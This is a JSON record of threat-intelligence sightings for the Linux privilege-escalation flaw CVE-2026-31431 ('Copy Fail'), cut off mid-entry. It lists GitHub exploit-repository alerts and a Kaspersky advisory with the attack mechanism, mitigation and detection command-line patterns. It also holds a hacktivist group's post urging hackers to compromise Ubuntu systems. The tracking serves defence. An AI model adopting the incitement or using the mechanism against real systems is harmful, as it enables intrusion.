"type": "seen", "source": "https://t.me/GithubRedTeam/82451", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a HulnotHutu\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 08:48:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u5bf9 CVE-2026-31431 \u7684\u590d\u73b0\u5206\u6790\u3001C \u6539\u7f16\u7684 exp\u3002\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T09:00:04.000000Z"}, {"uuid": "ab57514e-18c6-43ae-a3de-7654c4f2e959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/VZeeypARXkvMlULXcP2IjG4vReJ0t9VhcOi0vz0KF3ybbfY", "content": "", "creation_timestamp": "2026-05-01T21:00:04.000000Z"}, {"uuid": "4ed23d9a-3616-49da-b127-07ce02c041fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/7QlwzNIR_X5g9vTBRsuXOB5NZOCwzi6d7HbUehnl_JOO7Qs", "content": "", "creation_timestamp": "2026-05-02T03:00:04.000000Z"}, {"uuid": "2166fef8-c7ef-4595-b83d-2c862ee48a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/Pn0o2pCSOYvgO1iCuzKUDmBM3bN6kcVxb6taAGbSrxeSQWE", "content": "", "creation_timestamp": "2026-05-01T11:00:13.000000Z"}, {"uuid": "deaafdca-b2e6-4d06-83f0-46a1f2f77277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/IgMXaUeI6SNBAHCh-M4SenGrw1gGeF6CA1UICLI_4bYZDIs", "content": "", "creation_timestamp": "2026-05-01T15:00:06.000000Z"}, {"uuid": "ec0d8629-3aa3-4700-bc23-b07c01ea1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/bldpaU4Fd3K5P_BYQnPbX8yM0aEM2e48CWOaj1lIbI-n9P0", "content": "", "creation_timestamp": "2026-05-01T15:00:14.000000Z"}, {"uuid": "4ff53f86-fcac-4c4c-9fc8-c24639209548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/Bh4iyBQIMN2Hl9Jl9GcG_tuPw1Psk_odE0qn4w68HKrpiOc", "content": "", "creation_timestamp": "2026-05-01T03:00:05.000000Z"}, {"uuid": "1b6bea9d-72e2-4ed9-a9dd-c982da799ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82481", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a suominen\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Nix\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 12:59:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nTracking CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T13:00:04.000000Z"}, {"uuid": "71cb26c3-3233-40af-809f-1402c5441f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82487", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a autorootlinux\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Huchangzhi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 13:53:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u57fa\u4e8eCVE-2026-31431\u7684\u81ea\u52a8root\u811a\u672c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T14:00:04.000000Z"}, {"uuid": "99e95589-a0e7-4dba-a09e-6863608d89c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/xX313XxTeam/1104", "content": "\u0647\u0630\u0627 \u0647\u0648\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2026-31431 \u0628\u0623\u0633\u0645 Copy Fail \u0646\u0646\u0635\u062d \u0627\u0644\u062c\u0645\u0628\u0639 \u0628\u0623\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0623\u062e\u062a\u0631\u0627\u0642 \u0627\u0646\u0638\u0645\u0629 Ubuntu \u0628\u0639\u062f \u0641\u0634\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0627\u0646\u0638\u0645\u0629 \u0628\u0633\u0628\u0628 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0630\u064a \u0646\u0641\u0630\u062a\u0647 \u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642 - \u0641\u0631\u064a\u0642 313 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Ubuntu \u0648\u062a\u0639\u0637\u064a\u0644\u0647\u0627 \u0628\u0627\u0644\u0643\u0627\u0645\u0644.\nThis is the exploit for the vulnerability CVE-2026-31431, codenamed \"Copy Fail.\" We recommend that everyone utilize it to compromise Ubuntu systems, following the failure of system updates caused by the attack executed by the Islamic Cyber \u200b\u200bResistance in Iraq \u2013 313 Team against Ubuntu's infrastructure, which resulted in its complete disablement.\n\n313 Team | BackUp | Beamed\n\n\u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642\n\u0641\u0631\u064a\u0642 313\n#313_Team\n#Beamed_Network", "creation_timestamp": "2026-05-02T19:45:38.000000Z"}, {"uuid": "aea83453-f72e-4de5-bafc-13d621a6d93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/xX313XxTeam/1101", "content": "\u0627\u0644\u0627\u0646 \u062a\u0646\u0641\u0630 \u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642 - \u0641\u0631\u064a\u0642 313 \u0647\u062c\u0648\u0645 \u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0636\u062e\u0645 \u064a\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0645\u0643\u0648\u0646\u0627\u062a \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0644\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u0627\u0633\u0627\u0633\u064a\u0629 \u0644\u0640Ubuntu \u0648\u0627\u0644\u0627\u0646 \u0644\u0627 \u064a\u0645\u0643\u0646 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0639\u0627\u062f\u064a\u0629 \u0644\u0627 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0645\u0646\u064a\u0629 \u0644\u0627 \u062a\u062b\u0628\u064a\u062a \u0644\u0644\u0628\u0631\u0627\u0645\u062c \u0648 CI/CD \u0627\u0646\u0647\u0627\u0631 \u0648\u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u062a\u062a\u0648\u0642\u0641 \u062a\u062f\u0631\u064a\u062c\u064a\u0627\u064b\u060c \u0633\u064a\u0633\u062a\u0645\u0631 \u0644\u0645\u062f\u0629 8 \u0633\u0627\u0639\u0627\u062a \u0648\u0642\u062f \u064a\u0645\u062a\u062f \u0627\u0644\u0647\u062c\u0648\u0645 \u0644\u0645\u062f\u0629 \u0627\u0637\u0648\u0644.\n\u0628\u0639\u062f \u062a\u0648\u0642\u0641 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0627\u0645\u0627\u0646 \u0646\u0646\u0635\u062d \u0627\u0644\u0645\u062e\u062a\u0631\u0642\u064a\u0646 \u0628\u0628\u062f\u0627\u0621 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2026-31431 \u0648\u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0628\u0623\u0633\u0645 Copy Fail \u0644\u0627\u0646 \u0627\u063a\u0644\u0628 \u0627\u0644\u0627\u0646\u0638\u0645\u0629 \u0627\u0644\u0627\u0646 \u062a\u0639\u0627\u0646\u064a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u0639\u062f \u062a\u0639\u0637\u0644 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0627\u0645\u0627\u0646 \u0648\u062a\u0639\u0637\u0644 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u064a \u0627\u0646 \u0627\u0646\u0638\u0645\u0629 Ubuntu \u0627\u0644\u0627\u0646 \u0641\u0631\u064a\u0633\u0647 \u0633\u0647\u0644\u0647 \u0644\u0644\u0645\u062e\u062a\u0631\u0642\u064a\u0646.\nThe Islamic Cyber \u200b\u200bResistance in Iraq \u2013 313 Team is currently executing a massive cyberattack targeting key components of the Ubuntu infrastructure. Consequently, standard updates, security patches, and software installations are currently impossible; CI/CD pipelines have collapsed, and the infrastructure is gradually grinding to a halt. This disruption is expected to last for eight hours, though the attack may potentially extend for a longer duration.\nFollowing the suspension of security updates, we advise hackers to begin exploiting vulnerability CVE-2026-31431\u2014known as \"Copy Fail.\" This is because the majority of systems are now susceptible to this flaw due to the disruption of security updates and software installations, rendering Ubuntu systems easy prey for hackers.\n\n313 Team | BackUp | Beamed\n\n\u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642\n\u0641\u0631\u064a\u0642 313\n#313_Team\n#Beamed_Network", "creation_timestamp": "2026-05-02T19:45:30.000000Z"}, {"uuid": "2064b7f5-5089-41cc-b1b2-d68d5d40b42f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82538", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pulentoski\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 23:58:57\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T00:00:05.000000Z"}, {"uuid": "af7b6510-cae1-4a91-9130-5ad5a76d75c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/kasperskyb2b/2157", "content": "\u041d\u0430 \u0434\u043d\u044f\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-31431 (CopyFail) \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0421\u0443\u0442\u044c \u0443\u0437\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \n\n\u041a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c authencesn \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0447\u0430\u0441\u0442\u044c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u00ab\u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\u0430\u00bb \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u0435 \u0431\u0430\u0439\u0442\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u0435\u0448\u0430 \u0444\u0430\u0439\u043b\u0430. \u042d\u0442\u043e \u0434\u0430\u0451\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043a\u0435\u0448 \u043b\u044e\u0431\u043e\u0433\u043e \u0447\u0438\u0442\u0430\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430. \n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 732-\u0431\u0430\u0439\u0442\u043d\u044b\u0439 Python-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 AF_ALG \u0438 splice \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0447\u0435\u0442\u044b\u0440\u0451\u0445 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442 \u0432 \u043a\u0435\u0448, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, setuid-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u043a\u043e\u0434 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0448\u0435\u043b\u043b \u0441 \u0440\u0443\u0442\u043e\u0432\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438. \n\n\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c:\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u044f\u0434\u0440\u043e, \u0430 \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u2014 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c algif_aead (\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 AF_ALG \u0434\u043b\u044f AEAD).\n\n\u041a\u0430\u043a \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443: \n\n\u0410\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u043d\u0430 Python \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0435 \u0432\u044b\u0448\u0435.  \u0417\u0430\u043f\u0443\u0441\u043a \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u043c \u0441\u0442\u0440\u043e\u043a\u0430\u043c:\n \nsh -c -- su\nsh -c -- newgrp\nsh -c -- passwd\nsh -c -- gpasswd\nsh -c -- sudo\nsh -c -- chfn\nsh -c -- umount\nsh -c -- mount\nsh -c -- fusermount3\nsh -c -- chsh\nsh -c -- su\n\n\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 setuid-\u0444\u0430\u0439\u043b\u0430\u043c\u0438. \u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443 \u043f\u043e \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e\u0439 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432: Python \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 Shell. \n\n\u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0434\u0440\u0443\u0433\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432, \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c\u0441\u044f. \u0421\u043b\u0435\u0434\u0438\u0442\u0435 \u0437\u0430 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043e\u0442 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043b\u0438\u0431\u043e \u0444\u0430\u0439\u043b\u043e\u0432, \u043d\u0435\u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0445 \u0434\u043b\u044f \u0432\u0430\u0448\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.", "creation_timestamp": "2026-04-30T14:30:05.000000Z"}, {"uuid": "d812ee57-dfd1-4967-9f24-2af8503639a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82552", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jbnetwork-git\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 00:40:42\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431  Helper basado en https://copy.fail/\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T01:00:05.000000Z"}, {"uuid": "e54bfc0b-7e23-458f-8e97-c4f38728d723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ctinow/249645", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments\nhttps://ift.tt/DoaNdPk", "creation_timestamp": "2026-05-02T03:54:20.000000Z"}, {"uuid": "9305f015-a50e-4ae3-9feb-c7ba8b53d5a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/L4sKdvuAMq3ugqIKlVfY5v_-kzPZgLFDy0BVpy-19DgU_A", "content": "", "creation_timestamp": "2026-04-30T13:36:52.000000Z"}, {"uuid": "418c9fe0-74b4-4c17-86b5-7c2f3bf8a554", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82566", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-Fail-CVE-2026-31431-Linux-exp-tools-C-EXP\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a YuCc777\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 03:22:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail-CVE-2026-31431&Linux \u63d0\u6743\u5de5\u5177&Linux-exp-tools&C-EXP\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T04:00:03.000000Z"}, {"uuid": "0fb59c20-5919-4359-9ad7-236fa6f55d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82592", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a vyahello\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 07:57:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux local privilege escalation PoC for CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T08:00:04.000000Z"}, {"uuid": "a48c39a1-2b31-45ea-98b4-5baf5d2fbaff", "vulnerability_lookup_origin": 